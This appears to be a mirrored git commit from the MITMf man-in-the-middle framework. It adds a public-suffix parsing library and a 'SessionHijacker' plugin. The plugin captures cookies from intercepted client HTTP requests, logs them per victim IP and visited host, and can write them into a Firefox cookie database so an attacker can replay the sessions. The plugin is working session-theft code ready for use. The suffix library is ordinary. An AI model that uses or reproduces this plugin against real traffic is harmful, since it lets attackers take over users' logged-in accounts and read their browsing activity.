mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 21:42:17 -07:00
added SessionHijacker plugin
This commit is contained in:
parent
0190104de5
commit
60548c92bd
3 changed files with 5140 additions and 0 deletions
106
libs/publicsuffix.py
Normal file
106
libs/publicsuffix.py
Normal file
|
@@ -0,0 +1,106 @@
|
||||||
|
"""Public Suffix List module for Python.
|
||||||
|
"""
|
||||||
|
|
||||||
|
import codecs
|
||||||
|
import os.path
|
||||||
|
|
||||||
|
class PublicSuffixList(object):
    """Parsed representation of the Public Suffix List.

    The list is compiled into a nested tree keyed by domain label
    (right-to-left), which get_public_suffix() then walks to find the
    registrable portion of a DNS name.
    """

    def __init__(self, input_file=None):
        """Read and parse a public suffix list.

        input_file is a file object or another iterable that yields the
        lines of a public suffix list file. When input_file is None, a
        UTF-8 encoded file named "publicsuffix.txt" located next to this
        module is read instead.

        The file format is described at http://publicsuffix.org/list/
        """
        if input_file is None:
            default_path = os.path.join(os.path.dirname(__file__), 'publicsuffix.txt')
            input_file = codecs.open(default_path, "r", "utf8")

        self.root = self._simplify(self._build_structure(input_file))

    def _find_node(self, parent, parts):
        # Walk (and create as needed) the tree path for the labels in
        # `parts`, consuming them right-to-left; returns the final node.
        # Mutable nodes are lists: [negate] or [negate, children-dict].
        node = parent
        while parts:
            if len(node) == 1:
                node.append({})
            children = node[1]
            label = parts.pop()
            nxt = children.get(label)
            if nxt is None:
                nxt = children[label] = [0]
            node = nxt
        return node

    def _add_rule(self, root, rule):
        # A leading '!' marks an exception rule (negate = 1).
        negate = 0
        if rule.startswith('!'):
            negate = 1
            rule = rule[1:]
        self._find_node(root, rule.split('.'))[0] = negate

    def _simplify(self, node):
        # Freeze the mutable build tree: leaves collapse to their negate
        # flag, interior nodes become (negate, {label: subtree}) tuples.
        if len(node) == 1:
            return node[0]
        negate, children = node
        return (negate, dict((label, self._simplify(sub)) for label, sub in children.items()))

    def _build_structure(self, fp):
        root = [0]
        for raw in fp:
            stripped = raw.strip()
            # Skip blank lines and '//' comments.
            if not stripped or stripped.startswith('//'):
                continue
            self._add_rule(root, stripped.split()[0].lstrip('.'))
        return root

    def _lookup_node(self, matches, depth, parent, parts):
        # Record, per label position (counted from the right), whether a
        # matching rule is normal (0) or an exception (1); None = no rule.
        if parent in (0, 1):
            negate, children = parent, None
        else:
            negate, children = parent

        matches[-depth] = negate

        if children and depth < len(parts):
            # Both the wildcard branch and the literal label may match.
            for label in ('*', parts[-depth]):
                sub = children.get(label)
                if sub is not None:
                    self._lookup_node(matches, depth + 1, sub, parts)

    def get_public_suffix(self, domain):
        """get_public_suffix("www.example.com") -> "example.com"

        Calling this function with a DNS name will return the
        public suffix for that name.

        Note that for internationalized domains the list at
        http://publicsuffix.org uses decoded names, so it is
        up to the caller to decode any Punycode-encoded names.
        """
        labels = domain.lower().lstrip('.').split('.')
        hits = [None] * len(labels)

        self._lookup_node(hits, 1, self.root, labels)

        # The leftmost position matched by a non-exception rule starts
        # the registrable domain. (None == 0 is False, so exception and
        # unmatched positions are both skipped.)
        for idx, flag in enumerate(hits):
            if flag == 0:
                return '.'.join(labels[idx:])
|
4909
libs/publicsuffix.txt
Normal file
4909
libs/publicsuffix.txt
Normal file
File diff suppressed because it is too large
Load diff
125
plugins/SessionHijacker.py
Normal file
125
plugins/SessionHijacker.py
Normal file
|
@@ -0,0 +1,125 @@
|
||||||
|
#Almost all of the Firefox related code was stolen from Glenn's Firelamb.
|
||||||
|
#glenn@sensepost.com
|
||||||
|
|
||||||
|
from plugins.plugin import Plugin
|
||||||
|
from sslstrip.URLMonitor import URLMonitor
|
||||||
|
from libs.publicsuffix import PublicSuffixList
|
||||||
|
from urlparse import urlparse
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import time
|
||||||
|
import logging
|
||||||
|
import sqlite3
|
||||||
|
import threading
|
||||||
|
|
||||||
|
class SessionHijacker(Plugin):
|
||||||
|
name = "Session Hijacker"
|
||||||
|
optname = "hijack"
|
||||||
|
desc = "Performs session hijacking attacks against clients"
|
||||||
|
implements = ["cleanHeaders"] #["handleHeader"]
|
||||||
|
has_opts = True
|
||||||
|
|
||||||
|
def initialize(self, options):
|
||||||
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
|
self.options = options
|
||||||
|
self.log_clients = options.clients
|
||||||
|
self.urlMonitor = URLMonitor.getInstance()
|
||||||
|
self.psl = PublicSuffixList()
|
||||||
|
self.firefox = options.firefox
|
||||||
|
self.save_dir = "./logs"
|
||||||
|
self.seen_hosts = {}
|
||||||
|
self.sql_conns = {}
|
||||||
|
self.html_header="<h2>Cookies sniffed for the following domains\n<hr>\n<br>"
|
||||||
|
|
||||||
|
#Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires
|
||||||
|
#SQLite version 3.7.0 or later. You won't be able to read the database files
|
||||||
|
#with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted
|
||||||
|
#or is not a database" message.
|
||||||
|
|
||||||
|
sqlv = sqlite3.sqlite_version.split('.')
|
||||||
|
if (sqlv[0] <3 or sqlv[1] < 7):
|
||||||
|
sys.exit("[-] sqlite3 version 3.7 or greater required")
|
||||||
|
|
||||||
|
if not os.path.exists("./logs"):
|
||||||
|
os.makedirs("./logs")
|
||||||
|
|
||||||
|
print "[*] Session Hijacker plugin online"
|
||||||
|
|
||||||
|
def cleanHeaders(self, request): # Client => Server
|
||||||
|
headers = request.getAllHeaders().copy()
|
||||||
|
client_ip = request.getClientIP()
|
||||||
|
|
||||||
|
if 'cookie' in headers:
|
||||||
|
message = "%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])
|
||||||
|
|
||||||
|
if self.firefox:
|
||||||
|
url = "http://" + headers['host'] + request.getPathFromUri()
|
||||||
|
for cookie in headers['cookie'].split(';'):
|
||||||
|
eq = cookie.find("=")
|
||||||
|
cname = str(cookie)[0:eq].strip()
|
||||||
|
cvalue = str(cookie)[eq+1:].strip()
|
||||||
|
#t = threading.Thread(name='firefoxdb', target=self.firefoxdb, args=(headers['host'], cname, cvalue, url, client_ip))
|
||||||
|
#t.setDaemon(True)
|
||||||
|
#t.start()
|
||||||
|
self.firefoxdb(headers['host'], cname, cvalue, url, client_ip)
|
||||||
|
else:
|
||||||
|
logging.info(message)
|
||||||
|
|
||||||
|
|
||||||
|
#def handleHeader(self, request, key, value): # Server => Client
|
||||||
|
# if 'set-cookie' in request.client.headers:
|
||||||
|
# cookie = request.client.headers['set-cookie']
|
||||||
|
# #host = request.client.headers['host'] #wtf????
|
||||||
|
# message = "%s Got server cookie: %s" % (request.client.getClientIP(), cookie)
|
||||||
|
# if self.urlMonitor.isClientLogging() is True:
|
||||||
|
# self.urlMonitor.writeClientLog(request.client, request.client.headers, message)
|
||||||
|
# else:
|
||||||
|
# logging.info(message)
|
||||||
|
|
||||||
|
def firefoxdb(self, host, cookie_name, cookie_value, url, ip):
|
||||||
|
|
||||||
|
session_dir=self.save_dir + "/" + ip
|
||||||
|
cookie_file=session_dir +'/cookies.sqlite'
|
||||||
|
cookie_file_exists = os.path.exists(cookie_file)
|
||||||
|
|
||||||
|
if (ip not in (self.sql_conns and os.listdir("./logs"))):
|
||||||
|
|
||||||
|
try:
|
||||||
|
if not os.path.exists(session_dir):
|
||||||
|
os.makedirs(session_dir)
|
||||||
|
|
||||||
|
db = sqlite3.connect(cookie_file, isolation_level=None)
|
||||||
|
self.sql_conns[ip] = db.cursor()
|
||||||
|
|
||||||
|
if not cookie_file_exists:
|
||||||
|
self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))")
|
||||||
|
self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)")
|
||||||
|
except Exception, e:
|
||||||
|
print str(e)
|
||||||
|
|
||||||
|
scheme = urlparse(url).scheme
|
||||||
|
scheme = (urlparse(url).scheme)
|
||||||
|
basedomain = self.psl.get_public_suffix(host)
|
||||||
|
address = urlparse(url).hostname
|
||||||
|
short_url = scheme + "://"+ address
|
||||||
|
|
||||||
|
log = open(session_dir + '/visited.html','a')
|
||||||
|
if (ip not in self.seen_hosts):
|
||||||
|
self.seen_hosts[ip] = {}
|
||||||
|
log.write(self.html_header)
|
||||||
|
|
||||||
|
if (address not in self.seen_hosts[ip]):
|
||||||
|
self.seen_hosts[ip][address] = 1
|
||||||
|
log.write("\n<br>\n<a href='%s'>%s</a>" %(short_url, address))
|
||||||
|
|
||||||
|
log.close()
|
||||||
|
|
||||||
|
if address == basedomain:
|
||||||
|
address = "." + address
|
||||||
|
|
||||||
|
expire_date = 2000000000 #Year2033
|
||||||
|
now = int(time.time()) - 600
|
||||||
|
self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0))
|
||||||
|
|
||||||
|
def add_options(self, options):
|
||||||
|
options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies')
|
Loading…
Add table
Add a link
Reference in a new issue